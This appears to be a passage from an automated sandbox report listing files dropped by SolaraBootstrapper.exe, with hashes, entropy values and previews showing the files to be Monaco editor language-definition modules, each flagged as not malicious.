                                                  Preview:"use strict";/*!-----------------------------------------------------------------------------. * Copyright (c) Microsoft Corporation. All rights reserved.. * Version: 0.45.0(5e5af013f8d295555a7210df0d5f2cea0bf5dd56). * Released under the MIT license. * https://github.com/microsoft/monaco-editor/blob/main/LICENSE.txt. *-----------------------------------------------------------------------------*/.define("vs/basic-languages/powershell/powershell", ["require","require"],(require)=>{.var moduleExports=(()=>{var o=Object.defineProperty;var r=Object.getOwnPropertyDescriptor;var i=Object.getOwnPropertyNames;var l=Object.prototype.hasOwnProperty;var c=(n,e)=>{for(var t in e)o(n,t,{get:e[t],enumerable:!0})},g=(n,e,t,a)=>{if(e&&typeof e=="object"||typeof e=="function")for(let s of i(e))!l.call(n,s)&&s!==t&&o(n,s,{get:()=>e[s],enumerable:!(a=r(e,s))||a.enumerable});return n};var p=n=>g(o({},"__esModule",{value:!0}),n);var u={};c(u,{conf:()=>d,language:()=>m});var d={wordPattern:/(-?\d*\.\d\w*)|(
                                                  Process:C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe
                                                  File Type:ASCII text, with very long lines (8409)
                                                  Category:dropped
                                                  Size (bytes):9877
                                                  Entropy (8bit):5.223671892936882
                                                  Encrypted:false
                                                  SSDEEP:96:pQFDHnYRsy+/EgrbV1+h/cV1+hKcYq1cDPLITM4sV7Mu2hu2nS6jXBXFRWX4f6+G:G9YcrTNeOITRS6LxFRwWLkqMhGXO
                                                  MD5:3D70B74FED0C171EE216597E497CCBA5
                                                  SHA1:0939E92B22CAD0626FA8E2B50B1601F0251FE6E6
                                                  SHA-256:6E62B15B050502ABEF7D2F721A2C395A4774BBD43E1E0B0B02DA2129BA8F663F
                                                  SHA-512:78D664666A71B0CB65A6C15983684EB583DF005CAB0558F06AE073F4AFEF5F35260DDE6D8B7B3ADA30F7FC0A1DA467EEFFA4279FF9E14147C5FE960AA8407E1A
                                                  Malicious:false
                                                  Preview:"use strict";/*!-----------------------------------------------------------------------------. * Copyright (c) Microsoft Corporation. All rights reserved.. * Version: 0.45.0(5e5af013f8d295555a7210df0d5f2cea0bf5dd56). * Released under the MIT license. * https://github.com/microsoft/monaco-editor/blob/main/LICENSE.txt. *-----------------------------------------------------------------------------*/.define("vs/basic-languages/protobuf/protobuf", ["require","require"],(require)=>{.var moduleExports=(()=>{var o=Object.defineProperty;var r=Object.getOwnPropertyDescriptor;var c=Object.getOwnPropertyNames;var a=Object.prototype.hasOwnProperty;var p=(t,e)=>{for(var i in e)o(t,i,{get:e[i],enumerable:!0})},d=(t,e,i,s)=>{if(e&&typeof e=="object"||typeof e=="function")for(let n of c(e))!a.call(t,n)&&n!==i&&o(t,n,{get:()=>e[n],enumerable:!(s=r(e,n))||s.enumerable});return t};var l=t=>d(o({},"__esModule",{value:!0}),t);var m={};p(m,{conf:()=>u,language:()=>f});var k=["true","false"],u={comments:{line
                                                  Process:C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe
                                                  File Type:ASCII text, with very long lines (5150)
                                                  Category:dropped
                                                  Size (bytes):5649
                                                  Entropy (8bit):5.178070019328666
                                                  Encrypted:false
                                                  SSDEEP:96:pQFDHnYRs6+/EJ3oreqgq+q+q1UcmFIfnzvN0EJ40LW+LmlgKGJ6V0+piF6ywZ6r:G9YFYrjUxQvKgK2boV0YivwZ6e3Ab
                                                  MD5:E84EEEF7AFCD1C54564DBF844DEF865C
                                                  SHA1:9CCF2F8C6590A548B71AB58FA0FF578273237437
                                                  SHA-256:7989C74CE5C72ED5559103A4289E3D8C67387D552A12E5495CA186D7D5985960
                                                  SHA-512:4050084FC983304D636599C521470A645E9C28E433E89DC24026DA2A5C4DF3354135AD22EAC6C15D35A5F62B482E831F7CEB88B82C1852E6B8386054EDC10CC1
                                                  Malicious:false
                                                  Preview:"use strict";/*!-----------------------------------------------------------------------------. * Copyright (c) Microsoft Corporation. All rights reserved.. * Version: 0.45.0(5e5af013f8d295555a7210df0d5f2cea0bf5dd56). * Released under the MIT license. * https://github.com/microsoft/monaco-editor/blob/main/LICENSE.txt. *-----------------------------------------------------------------------------*/.define("vs/basic-languages/pug/pug", ["require","require"],(require)=>{.var moduleExports=(()=>{var a=Object.defineProperty;var i=Object.getOwnPropertyDescriptor;var l=Object.getOwnPropertyNames;var r=Object.prototype.hasOwnProperty;var p=(t,e)=>{for(var o in e)a(t,o,{get:e[o],enumerable:!0})},c=(t,e,o,s)=>{if(e&&typeof e=="object"||typeof e=="function")for(let n of l(e))!r.call(t,n)&&n!==o&&a(t,n,{get:()=>e[n],enumerable:!(s=i(e,n))||s.enumerable});return t};var d=t=>c(a({},"__esModule",{value:!0}),t);var g={};p(g,{conf:()=>m,language:()=>u});var m={comments:{lineComment:"//"},brackets:[["{",
                                                  Process:C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe
                                                  File Type:ASCII text, with very long lines (4197)
                                                  Category:dropped
                                                  Size (bytes):4702
                                                  Entropy (8bit):5.2574940606967395
                                                  Encrypted:false
                                                  SSDEEP:96:pQFDHnYRsyzYio+1/1GMna/oK65wV1+K6V1+/GDqHQ5284Ph/B0vcdBBj1dAnO2s:G9YdnOMnLK65YyCs284PLbX/GOL
                                                  MD5:872273B250E1BEE4BE8213195AAA7B91
                                                  SHA1:9509469FDCAD88D892851DF6E454A16822DDF279
                                                  SHA-256:34ED9698F52C310A991ED3A9A375D0BA8D86690BBBCB488CF7ED23606AC6CA84
                                                  SHA-512:F6B04A652ED51AF924657D367E67F6947A00C4117E376A6AAC57A6B3A304C02BCF39AB2D1D822D247A1BCA7B731E54CA0A03F1F2396A79D36968D094705DBB8F
                                                  Malicious:false
                                                  Preview:"use strict";/*!-----------------------------------------------------------------------------. * Copyright (c) Microsoft Corporation. All rights reserved.. * Version: 0.45.0(5e5af013f8d295555a7210df0d5f2cea0bf5dd56). * Released under the MIT license. * https://github.com/microsoft/monaco-editor/blob/main/LICENSE.txt. *-----------------------------------------------------------------------------*/.define("vs/basic-languages/python/python", ["require","require"],(require)=>{.var moduleExports=(()=>{var d=Object.create;var i=Object.defineProperty;var m=Object.getOwnPropertyDescriptor;var _=Object.getOwnPropertyNames;var u=Object.getPrototypeOf,f=Object.prototype.hasOwnProperty;var b=(e=>typeof require!="undefined"?require:typeof Proxy!="undefined"?new Proxy(e,{get:(n,t)=>(typeof require!="undefined"?require:n)[t]}):e)(function(e){if(typeof require!="undefined")return require.apply(this,arguments);throw new Error('Dynamic require of "'+e+'" is not supported')});var h=(e,n)=>()=>(n||e((n={e
                                                  Process:C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe
                                                  File Type:ASCII text, with very long lines (3257)
                                                  Category:dropped
                                                  Size (bytes):3762
                                                  Entropy (8bit):5.163659967447653
                                                  Encrypted:false
                                                  SSDEEP:96:pQFDHnYRsf+/E2rPV1+GV1+PbHX8VWTJ7CORzvH/J6VbjtBYQx:G9YhrH/O38VyJjRz34zJ
                                                  MD5:5736E6CB5E34939249F68B8F5E3D3F6A
                                                  SHA1:B4E33C09626172373926FF9FB29F2F4DDF3ED2E6
                                                  SHA-256:85E681ADF56A9813AB1A514DDDEA17B919ED48AE07C4A564703619F93DCA0D78
                                                  SHA-512:4D254E3E928A0AAC000A2D87B58C1F2963F20813D397F159FB81002CD14F2E7A4F2EF8D381097D979808991E1026572A8331966CAFC199B8549867D60B2B235B
                                                  Malicious:false
                                                  Preview:"use strict";/*!-----------------------------------------------------------------------------. * Copyright (c) Microsoft Corporation. All rights reserved.. * Version: 0.45.0(5e5af013f8d295555a7210df0d5f2cea0bf5dd56). * Released under the MIT license. * https://github.com/microsoft/monaco-editor/blob/main/LICENSE.txt. *-----------------------------------------------------------------------------*/.define("vs/basic-languages/qsharp/qsharp", ["require","require"],(require)=>{.var moduleExports=(()=>{var a=Object.defineProperty;var i=Object.getOwnPropertyDescriptor;var r=Object.getOwnPropertyNames;var l=Object.prototype.hasOwnProperty;var c=(t,e)=>{for(var n in e)a(t,n,{get:e[n],enumerable:!0})},u=(t,e,n,s)=>{if(e&&typeof e=="object"||typeof e=="function")for(let o of r(e))!l.call(t,o)&&o!==n&&a(t,o,{get:()=>e[o],enumerable:!(s=i(e,o))||s.enumerable});return t};var p=t=>u(a({},"__esModule",{value:!0}),t);var m={};c(m,{conf:()=>d,language:()=>g});var d={comments:{lineComment:"//"},brackets:
                                                  Process:C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe
                                                  File Type:ASCII text, with very long lines (3453)
                                                  Category:dropped
                                                  Size (bytes):3948
                                                  Entropy (8bit):5.238735035874947
                                                  Encrypted:false
                                                  SSDEEP:96:pQFDHnYRsCrK+/EhpUmV1+IV1+38O1hG6URj1AAEvTUTfBprOJ:G9Yzrkaij49ne5STUT5lI
                                                  MD5:81ADC67747B5678D3F30F7F42FC698F5
                                                  SHA1:21F5E748FDA662EE15595AFB9A313AB446D97949
                                                  SHA-256:0DB30B3566ED90BE1D37712CB86E40BECB27EDBF7BA1207A1487B981BC8E7F61
                                                  SHA-512:8EDA53B44E7337CC83FE8B419DFF2BA16FE13D1B68B6E0FBD969EE60C088607B4DA41B75C2DC45CBE43EBFF8F999642BDA278CF0F31F2F68F24B92E9F3C37C5F
                                                  Malicious:false
                                                  Preview:"use strict";/*!-----------------------------------------------------------------------------. * Copyright (c) Microsoft Corporation. All rights reserved.. * Version: 0.45.0(5e5af013f8d295555a7210df0d5f2cea0bf5dd56). * Released under the MIT license. * https://github.com/microsoft/monaco-editor/blob/main/LICENSE.txt. *-----------------------------------------------------------------------------*/.define("vs/basic-languages/r/r", ["require","require"],(require)=>{.var moduleExports=(()=>{var a=Object.defineProperty;var s=Object.getOwnPropertyDescriptor;var i=Object.getOwnPropertyNames;var c=Object.prototype.hasOwnProperty;var l=(o,e)=>{for(var t in e)a(o,t,{get:e[t],enumerable:!0})},p=(o,e,t,n)=>{if(e&&typeof e=="object"||typeof e=="function")for(let r of i(e))!c.call(o,r)&&r!==t&&a(o,r,{get:()=>e[r],enumerable:!(n=s(e,r))||n.enumerable});return o};var m=o=>p(a({},"__esModule",{value:!0}),o);var u={};l(u,{conf:()=>d,language:()=>g});var d={comments:{lineComment:"#"},brackets:[["{","}"],
                                                  Process:C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe
                                                  File Type:exported SGML document, ASCII text, with very long lines (9358)
                                                  Category:dropped
                                                  Size (bytes):9861
                                                  Entropy (8bit):5.358988063399747
                                                  Encrypted:false
                                                  SSDEEP:192:G9YzAu3n+l+y+AEld2YaW40v4Ou6e+vMHjIoQceC8TdlgzYJXO:GeX+lhpsP3zkIoQceCEPJ+
                                                  MD5:10FAE53E31BC8FB1664154D50637F3F9
                                                  SHA1:77D077BA152C15A59A2392FDFC91A2B514732CEE
                                                  SHA-256:B67392D4BAEFBC48E9F0E28E661ADD4BE183BEC81016753CAC90D901A382B62F
                                                  SHA-512:BCFEEC3FB432CA83340F79C89E8EDED344E8010725E99269AFE5AB61906DB922D923873786EB40512A115D5D14F99CDDDA8D1B065E315AC73E348D1BD052688A
                                                  Malicious:false
                                                  Preview:"use strict";/*!-----------------------------------------------------------------------------. * Copyright (c) Microsoft Corporation. All rights reserved.. * Version: 0.45.0(5e5af013f8d295555a7210df0d5f2cea0bf5dd56). * Released under the MIT license. * https://github.com/microsoft/monaco-editor/blob/main/LICENSE.txt. *-----------------------------------------------------------------------------*/.define("vs/basic-languages/razor/razor", ["require","require"],(require)=>{.var moduleExports=(()=>{var h=Object.create;var m=Object.defineProperty;var u=Object.getOwnPropertyDescriptor;var b=Object.getOwnPropertyNames;var k=Object.getPrototypeOf,x=Object.prototype.hasOwnProperty;var y=(t=>typeof require!="undefined"?require:typeof Proxy!="undefined"?new Proxy(t,{get:(e,r)=>(typeof require!="undefined"?require:e)[r]}):t)(function(t){if(typeof require!="undefined")return require.apply(this,arguments);throw new Error('Dynamic require of "'+t+'" is not supported')});var T=(t,e)=>()=>(e||t((e={exp
                                                  Process:C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe
                                                  File Type:ASCII text, with very long lines (3878)
                                                  Category:dropped
                                                  Size (bytes):4381
                                                  Entropy (8bit):5.551929224886789
                                                  Encrypted:false
                                                  SSDEEP:96:pQFDHnYRsCdD6/kCfV1+/0V1+/F1c3kdKsTjuMZF/OmfEjac0pPGKP9XSC1U/R:G9YzdD+XxOc3kIsuM//OmMD0pP19Cj/R
                                                  MD5:0082F32DA6EEE980F29419DF4FEF2268
                                                  SHA1:2AA41D8EB8F47DB04C64AF943ACFB02A86BB69D3
                                                  SHA-256:805FA3F57140F854AAE63C1312187DB390206978C922E1527190206DB207963A
                                                  SHA-512:980F93869F3B25671DF8D1E544C50E31F8F85E8500039CE2AF8658F1D01DB12611E1D95112A39D5494DFD1D1033CFAE8C81244A2B89089C7310C2B55B9516ECB
                                                  Malicious:false
                                                  Preview:"use strict";/*!-----------------------------------------------------------------------------. * Copyright (c) Microsoft Corporation. All rights reserved.. * Version: 0.45.0(5e5af013f8d295555a7210df0d5f2cea0bf5dd56). * Released under the MIT license. * https://github.com/microsoft/monaco-editor/blob/main/LICENSE.txt. *-----------------------------------------------------------------------------*/.define("vs/basic-languages/redis/redis", ["require","require"],(require)=>{.var moduleExports=(()=>{var R=Object.defineProperty;var n=Object.getOwnPropertyDescriptor;var N=Object.getOwnPropertyNames;var s=Object.prototype.hasOwnProperty;var A=(S,E)=>{for(var T in E)R(S,T,{get:E[T],enumerable:!0})},O=(S,E,T,o)=>{if(E&&typeof E=="object"||typeof E=="function")for(let e of N(E))!s.call(S,e)&&e!==T&&R(S,e,{get:()=>E[e],enumerable:!(o=n(E,e))||o.enumerable});return S};var L=S=>O(R({},"__esModule",{value:!0}),S);var r={};A(r,{conf:()=>I,language:()=>i});var I={brackets:[["{","}"],["[","]"],["(",")"]
                                                  Process:C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe
                                                  File Type:ASCII text, with very long lines (12122)
                                                  Category:dropped
                                                  Size (bytes):12631
                                                  Entropy (8bit):5.09339099587543
                                                  Encrypted:false
                                                  SSDEEP:192:G9Yz1dLxaLQ7l23dDC5QPsHoa2WMrtSCV0bPjNQoMyIG6r9TjasF:GGdLxaI6+MJ/WfCuFQobIGe9/asF
                                                  MD5:8FE8B5C56FBAFF23F0BE14BDFFFAFE85
                                                  SHA1:E61DCB51E444870EA46A4B28D71F46A952EC5B4C
                                                  SHA-256:B1BD4C4D566B0D0688803F8B13ECC667C299100AB45C3F187B85906446F4EB65
                                                  SHA-512:2F229CD5B052DE3737A790FD2A1FD7F9BC323C299D61DFAA094373289D94B43809826D9D518443A7F7F1DDD709F1C95D63D3CA37C7174381D7CF87828F23B0A7
                                                  Malicious:false
                                                  Preview:"use strict";/*!-----------------------------------------------------------------------------. * Copyright (c) Microsoft Corporation. All rights reserved.. * Version: 0.45.0(5e5af013f8d295555a7210df0d5f2cea0bf5dd56). * Released under the MIT license. * https://github.com/microsoft/monaco-editor/blob/main/LICENSE.txt. *-----------------------------------------------------------------------------*/.define("vs/basic-languages/redshift/redshift", ["require","require"],(require)=>{.var moduleExports=(()=>{var i=Object.defineProperty;var s=Object.getOwnPropertyDescriptor;var o=Object.getOwnPropertyNames;var n=Object.prototype.hasOwnProperty;var p=(_,e)=>{for(var r in e)i(_,r,{get:e[r],enumerable:!0})},l=(_,e,r,a)=>{if(e&&typeof e=="object"||typeof e=="function")for(let t of o(e))!n.call(_,t)&&t!==r&&i(_,t,{get:()=>e[t],enumerable:!(a=s(e,t))||a.enumerable});return _};var g=_=>l(i({},"__esModule",{value:!0}),_);var m={};p(m,{conf:()=>c,language:()=>d});var c={comments:{lineComment:"--",blockC
                                                  Process:C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe
                                                  File Type:exported SGML document, Unicode text, UTF-8 text, with very long lines (4211)
                                                  Category:dropped
                                                  Size (bytes):4740
                                                  Entropy (8bit):5.48137039025458
                                                  Encrypted:false
                                                  SSDEEP:96:pQFDHnYRsCSb+/E4buyTV1+b+Vphj3oOCmd4h5SOak1Nq4bOIA2A2E7mGhG1O:G9Yz5bukKr40HlwHLCGE1O
                                                  MD5:B32D67455EB80DD7CCB5991872CA931B
                                                  SHA1:C699FA88CD66D5A12BCD72C846291B38738A88CC
                                                  SHA-256:1D05F1659F95D61251B4EFB8F9CBBCB06652FA82F95080637FCDBDF20B5B9242
                                                  SHA-512:DD2A550891DD84EC883FAB89197560488072EC563174DEF47F8ACB4BE918B44BC3C6404A5885E7BF82B0E089EA29633F73A879B169459B88382343ACFD2B8A86
                                                  Malicious:false
                                                  Preview:"use strict";/*!-----------------------------------------------------------------------------. * Copyright (c) Microsoft Corporation. All rights reserved.. * Version: 0.45.0(5e5af013f8d295555a7210df0d5f2cea0bf5dd56). * Released under the MIT license. * https://github.com/microsoft/monaco-editor/blob/main/LICENSE.txt. *-----------------------------------------------------------------------------*/.define("vs/basic-languages/restructuredtext/restructuredtext", ["require","require"],(require)=>{.var moduleExports=(()=>{var t=Object.defineProperty;var a=Object.getOwnPropertyDescriptor;var l=Object.getOwnPropertyNames;var r=Object.prototype.hasOwnProperty;var k=(n,e)=>{for(var i in e)t(n,i,{get:e[i],enumerable:!0})},c=(n,e,i,o)=>{if(e&&typeof e=="object"||typeof e=="function")for(let s of l(e))!r.call(n,s)&&s!==i&&t(n,s,{get:()=>e[s],enumerable:!(o=a(e,s))||o.enumerable});return n};var p=n=>c(t({},"__esModule",{value:!0}),n);var g={};k(g,{conf:()=>u,language:()=>m});var u={brackets:[["{","}
                                                  Process:C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe
                                                  File Type:ASCII text, with very long lines (8826)
                                                  Category:dropped
                                                  Size (bytes):9327
                                                  Entropy (8bit):5.369061884062009
                                                  Encrypted:false
                                                  SSDEEP:192:G9YzLXcxki35E7BuN7GVziYlm3z9GEpWyuyG:GqcxJE7cGsj9FsvL
                                                  MD5:344F7E809CD86EEAA00FC058B50DB8A3
                                                  SHA1:C1B4ECA2C3DACB87D2AC2DEAD7DD6BF342C86CCA
                                                  SHA-256:7A8F786527B3546E88C350D9B11DE0EDC801276ABC00741526407DC6859712D9
                                                  SHA-512:CECBFF19F0DBD21EE489E3D380DB87E79CBDF17850CC78D3D9AFA3C34C47962DE93405089F911AC78D598DCFF4C7DCAD85F029EE13F9F08C8E96D5DC9E407BA8
                                                  Malicious:false
                                                  Preview:"use strict";/*!-----------------------------------------------------------------------------. * Copyright (c) Microsoft Corporation. All rights reserved.. * Version: 0.45.0(5e5af013f8d295555a7210df0d5f2cea0bf5dd56). * Released under the MIT license. * https://github.com/microsoft/monaco-editor/blob/main/LICENSE.txt. *-----------------------------------------------------------------------------*/.define("vs/basic-languages/ruby/ruby", ["require","require"],(require)=>{.var moduleExports=(()=>{var o=Object.defineProperty;var i=Object.getOwnPropertyDescriptor;var c=Object.getOwnPropertyNames;var d=Object.prototype.hasOwnProperty;var p=(t,e)=>{for(var r in e)o(t,r,{get:e[r],enumerable:!0})},l=(t,e,r,s)=>{if(e&&typeof e=="object"||typeof e=="function")for(let n of c(e))!d.call(t,n)&&n!==r&&o(t,n,{get:()=>e[n],enumerable:!(s=i(e,n))||s.enumerable});return t};var a=t=>l(o({},"__esModule",{value:!0}),t);var m={};p(m,{conf:()=>g,language:()=>x});var g={comments:{lineComment:"#",blockComment:["
                                                  Process:C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe
                                                  File Type:ASCII text, with very long lines (4482)
                                                  Category:dropped
                                                  Size (bytes):4983
                                                  Entropy (8bit):5.458249624003439
                                                  Encrypted:false
                                                  SSDEEP:96:pQFDHnYRsCQP+/EvZrbV1+VV1+/UNdNmlf9LJ5MnWe1l0gHL4Rtnh4d6:G9YzUZrTcEllLJ5de3R4/B
                                                  MD5:3D36F7409A41A81012157E53CD2D3047
                                                  SHA1:C7D2E0D1DFEDE10EB656C9A3B80F368600789098
                                                  SHA-256:206151559B889581B3B522026A57F228CEAB4FB864747074BD80E7041CDB5BEB
                                                  SHA-512:185F34E92BF16F18620288EF174B65934E89146B978BD06ABA4ED90DFC3AF1BEB066831D29B3745F64A3EE5F7993BE7516603A4A9CA0CD1CEE72B9ABE20EE026
                                                  Malicious:false
                                                  Preview:"use strict";/*!-----------------------------------------------------------------------------. * Copyright (c) Microsoft Corporation. All rights reserved.. * Version: 0.45.0(5e5af013f8d295555a7210df0d5f2cea0bf5dd56). * Released under the MIT license. * https://github.com/microsoft/monaco-editor/blob/main/LICENSE.txt. *-----------------------------------------------------------------------------*/.define("vs/basic-languages/rust/rust", ["require","require"],(require)=>{.var moduleExports=(()=>{var r=Object.defineProperty;var i=Object.getOwnPropertyDescriptor;var a=Object.getOwnPropertyNames;var c=Object.prototype.hasOwnProperty;var _=(t,e)=>{for(var n in e)r(t,n,{get:e[n],enumerable:!0})},u=(t,e,n,s)=>{if(e&&typeof e=="object"||typeof e=="function")for(let o of a(e))!c.call(t,o)&&o!==n&&r(t,o,{get:()=>e[o],enumerable:!(s=i(e,o))||s.enumerable});return t};var l=t=>u(r({},"__esModule",{value:!0}),t);var m={};_(m,{conf:()=>f,language:()=>p});var f={comments:{lineComment:"//",blockComment:[
                                                  Process:C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe
                                                  File Type:ASCII text, with very long lines (2151)
                                                  Category:dropped
                                                  Size (bytes):2648
                                                  Entropy (8bit):5.363920113872401
                                                  Encrypted:false
                                                  SSDEEP:48:pQFDHn43tZRs+db+/EhHCIVJ1JFq11FqQ4gVgN88KEqWgdctA0Ve+S:pQFDHnYRs+9+/EwIVTq17qcEQRW6PP
                                                  MD5:511D54A2E20FD284F24D82C8159EC7AC
                                                  SHA1:C21812858BE2E3E801E26DDA8CFE6AFE6AD6FF04
                                                  SHA-256:58001EF158DE456BB44EBE9E7616308BE4F909C99C7483EDD4DFB9D886922C41
                                                  SHA-512:B41C3BAB81A78070A162D08AD8F2248AD9CF7B0ECD83ADBC03CB31A2949BA48463F8DF5D3E3F2652E6A49177037B555BBFFFCF6E35E124933267632EB1249168
                                                  Malicious:false
                                                  Preview:"use strict";/*!-----------------------------------------------------------------------------. * Copyright (c) Microsoft Corporation. All rights reserved.. * Version: 0.45.0(5e5af013f8d295555a7210df0d5f2cea0bf5dd56). * Released under the MIT license. * https://github.com/microsoft/monaco-editor/blob/main/LICENSE.txt. *-----------------------------------------------------------------------------*/.define("vs/basic-languages/sb/sb", ["require","require"],(require)=>{.var moduleExports=(()=>{var r=Object.defineProperty;var i=Object.getOwnPropertyDescriptor;var a=Object.getOwnPropertyNames;var l=Object.prototype.hasOwnProperty;var d=(o,e)=>{for(var t in e)r(o,t,{get:e[t],enumerable:!0})},c=(o,e,t,s)=>{if(e&&typeof e=="object"||typeof e=="function")for(let n of a(e))!l.call(o,n)&&n!==t&&r(o,n,{get:()=>e[n],enumerable:!(s=i(e,n))||s.enumerable});return o};var g=o=>c(r({},"__esModule",{value:!0}),o);var m={};d(m,{conf:()=>p,language:()=>f});var p={comments:{lineComment:"'"},brackets:[["(",")"
                                                  Process:C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe
                                                  File Type:ASCII text, with very long lines (7640)
                                                  Category:dropped
                                                  Size (bytes):8143
                                                  Entropy (8bit):5.325370547890824
                                                  Encrypted:false
                                                  SSDEEP:96:pQFDHnYRs/f+/EO6VogRo8+rbV1+/0V1+/+iE/kMCeyjEm+npEwHFh3uUueo1tn0:G9YOW6+rTxNfnph3uUqRinU9jMWE
                                                  MD5:98AC5351CBE9F2E6C7B31C4E8A01C929
                                                  SHA1:E725C45B547C277C2EC837422E5241A522856E01
                                                  SHA-256:FE4369DD35B2FE4879D63699AF578F4FC42A40154416F1F4DDA6DE8FE927D66D
                                                  SHA-512:3B5CF93C3168D98B5904FB3853A0D70FE4A429F6917E5ECE92AE4B178CC2B421E774D8F0BA1F3605413FF637CD82C333A89EB3C399A12EB18EC2B996D30258C2
                                                  Malicious:false
                                                  Preview:"use strict";/*!-----------------------------------------------------------------------------. * Copyright (c) Microsoft Corporation. All rights reserved.. * Version: 0.45.0(5e5af013f8d295555a7210df0d5f2cea0bf5dd56). * Released under the MIT license. * https://github.com/microsoft/monaco-editor/blob/main/LICENSE.txt. *-----------------------------------------------------------------------------*/.define("vs/basic-languages/scala/scala", ["require","require"],(require)=>{.var moduleExports=(()=>{var n=Object.defineProperty;var s=Object.getOwnPropertyDescriptor;var i=Object.getOwnPropertyNames;var d=Object.prototype.hasOwnProperty;var l=(t,e)=>{for(var r in e)n(t,r,{get:e[r],enumerable:!0})},c=(t,e,r,a)=>{if(e&&typeof e=="object"||typeof e=="function")for(let o of i(e))!d.call(t,o)&&o!==r&&n(t,o,{get:()=>e[o],enumerable:!(a=s(e,o))||a.enumerable});return t};var g=t=>c(n({},"__esModule",{value:!0}),t);var m={};l(m,{conf:()=>p,language:()=>w});var p={wordPattern:/(unary_[@~!#%^&*()\-=+\\|:
                                                  Process:C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe
                                                  File Type:ASCII text, with very long lines (2089)
                                                  Category:dropped
                                                  Size (bytes):2594
                                                  Entropy (8bit):5.330108799220234
                                                  Encrypted:false
                                                  SSDEEP:48:pQFDHn43tZRsc+/ENHgUzX0V1+T0V1+X2ce1VS96O+FuLFpwfS8:pQFDHnYRsc+/EWU4V1+IV1+Gcezrf/
                                                  MD5:904C018255072D30BE57176EBF34181D
                                                  SHA1:847E581FB420AB4B7849DE81CCEE46DF026B73BC
                                                  SHA-256:D42BE5D22975E53E1FCA77BC2250ECB59125A5C58047292BC20CBCE06F5C30D7
                                                  SHA-512:8D5DFA9CECC2F2C34C1645D58CD514348321D9D1857CD9B693A91D71508E0E1FCE328A4F219198D228DC758CD50A9A36C31FE3314D8AF393E7574762E16635E2
                                                  Malicious:false
                                                  Preview:"use strict";/*!-----------------------------------------------------------------------------. * Copyright (c) Microsoft Corporation. All rights reserved.. * Version: 0.45.0(5e5af013f8d295555a7210df0d5f2cea0bf5dd56). * Released under the MIT license. * https://github.com/microsoft/monaco-editor/blob/main/LICENSE.txt. *-----------------------------------------------------------------------------*/.define("vs/basic-languages/scheme/scheme", ["require","require"],(require)=>{.var moduleExports=(()=>{var s=Object.defineProperty;var r=Object.getOwnPropertyDescriptor;var i=Object.getOwnPropertyNames;var l=Object.prototype.hasOwnProperty;var c=(o,e)=>{for(var t in e)s(o,t,{get:e[t],enumerable:!0})},m=(o,e,t,a)=>{if(e&&typeof e=="object"||typeof e=="function")for(let n of i(e))!l.call(o,n)&&n!==t&&s(o,n,{get:()=>e[n],enumerable:!(a=r(e,n))||a.enumerable});return o};var p=o=>m(s({},"__esModule",{value:!0}),o);var u={};c(u,{conf:()=>d,language:()=>g});var d={comments:{lineComment:";",blockCommen
                                                  Process:C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe
                                                  File Type:ASCII text, with very long lines (2888)
                                                  Category:dropped
                                                  Size (bytes):7232
                                                  Entropy (8bit):5.15399422572643
                                                  Encrypted:false
                                                  SSDEEP:192:G9YgHxCN16rr9TnhPKIsuvzLPM7XALCvx:GcN16rr9TnhPKIsubL0jAO
                                                  MD5:8A57368E1765DA56A468F242918F86B1
                                                  SHA1:109D067C257C005C0C2ACAD6AF75DB928DF98902
                                                  SHA-256:52EE58F53CD91A92ED0DBA2DA45FD2E692604FDB9EA4CB2F86718CC798D76399
                                                  SHA-512:88BE39E019D259B1C034072B4BBA0186281AB13C93C0A9993D6F92B3CF6DDB7B1427DCA8997E18A0311CFA4AA23615ED2762B660FE8EB9F5000A4B835DE6A847
                                                  Malicious:false
                                                  Preview:"use strict";/*!-----------------------------------------------------------------------------. * Copyright (c) Microsoft Corporation. All rights reserved.. * Version: 0.45.0(5e5af013f8d295555a7210df0d5f2cea0bf5dd56). * Released under the MIT license. * https://github.com/microsoft/monaco-editor/blob/main/LICENSE.txt. *-----------------------------------------------------------------------------*/.define("vs/basic-languages/scss/scss", ["require","require"],(require)=>{.var moduleExports=(()=>{var i=Object.defineProperty;var a=Object.getOwnPropertyDescriptor;var l=Object.getOwnPropertyNames;var d=Object.prototype.hasOwnProperty;var c=(t,e)=>{for(var o in e)i(t,o,{get:e[o],enumerable:!0})},m=(t,e,o,r)=>{if(e&&typeof e=="object"||typeof e=="function")for(let n of l(e))!d.call(t,n)&&n!==o&&i(t,n,{get:()=>e[n],enumerable:!(r=a(e,n))||r.enumerable});return t};var s=t=>m(i({},"__esModule",{value:!0}),t);var k={};c(k,{conf:()=>u,language:()=>p});var u={wordPattern:/(#?-?\d*\.\d\w*%?)|([@$#!.:]
                                                  Process:C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe
                                                  File Type:ASCII text, with very long lines (3395)
                                                  Category:dropped
                                                  Size (bytes):3898
                                                  Entropy (8bit):5.293677593120131
                                                  Encrypted:false
                                                  SSDEEP:96:pQFDHnYRsC+/EzomV1+/mQcV1+/mQ/jAMMBU68OZQNlGNTQABZ7/T:G9YEi1x1wjIUQVNTJrr
                                                  MD5:367A05692CC27DA3D92FBE6228D413B1
                                                  SHA1:1C30902AD99E2B11A60D77586941C3F51B679978
                                                  SHA-256:A0D9F1A5CF3A2C1C62563226574240A7064CA8C7EAC39D061E87141A7CD8E4B5
                                                  SHA-512:D80BFB2E6003D7A474883B4A38DD2E0166EB2E3C663383B59A5089AA162931473D7252E5701906783154DA0C649B366E898DDBAD4EFC6BAD4D1DA3C8F390D866
                                                  Malicious:false
